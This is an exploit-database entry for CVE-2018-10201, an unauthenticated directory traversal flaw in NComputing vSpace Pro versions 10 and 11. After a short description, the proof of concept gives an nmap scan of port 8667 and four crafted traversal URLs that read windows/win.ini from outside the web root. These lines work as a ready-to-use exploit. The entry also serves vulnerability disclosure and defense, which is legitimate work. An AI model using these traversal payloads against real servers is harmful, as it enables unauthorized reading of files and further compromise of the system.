Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability.
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# Exploit Title: Ncomputing vSpace Pro v10 and v11 - Directory Traversal Vulnerability
# Date: 2018-04-20
# Software Vendor: NComputing
# Software Link:
# Author: Javier Bernardo
# CVE: CVE-2018-10201
# Category: Webapps
#[Description]
#
#It is possible to read arbitrary files outside the root directory of
#the web server. This vulnerability could be exploited remotely by a
#crafted URL without credentials, with a|/ or a|\ or a|./ or a|.\ as a
#directory-traversal pattern to TCP port 8667.
#
#An attacker can make use of this vulnerability to step out of the root
#directory and access other parts of the file system. This might give
#the attacker the ability to view restricted files, which could provide
#the attacker with more information required to further compromise the system.
#[PoC]
nmap -p T:8667 -Pn your_vSpace_server
Nmap scan report for your_vSpace_server (x.x.x.x)
Host is up (0.044s latency).
PORT STATE SERVICE
8667/tcp open unknown
https://your_vSpace_server:8667/.../.../.../.../.../.../.../.../.../windows/win.ini
https://your_vSpace_server:8667/...\...\...\...\...\...\...\...\...\windows\win.ini
https://your_vSpace_server:8667/..../..../..../..../..../..../..../..../..../windows/win.ini
https://your_vSpace_server:8667/....\....\....\....\....\....\....\....\....\windows\win.ini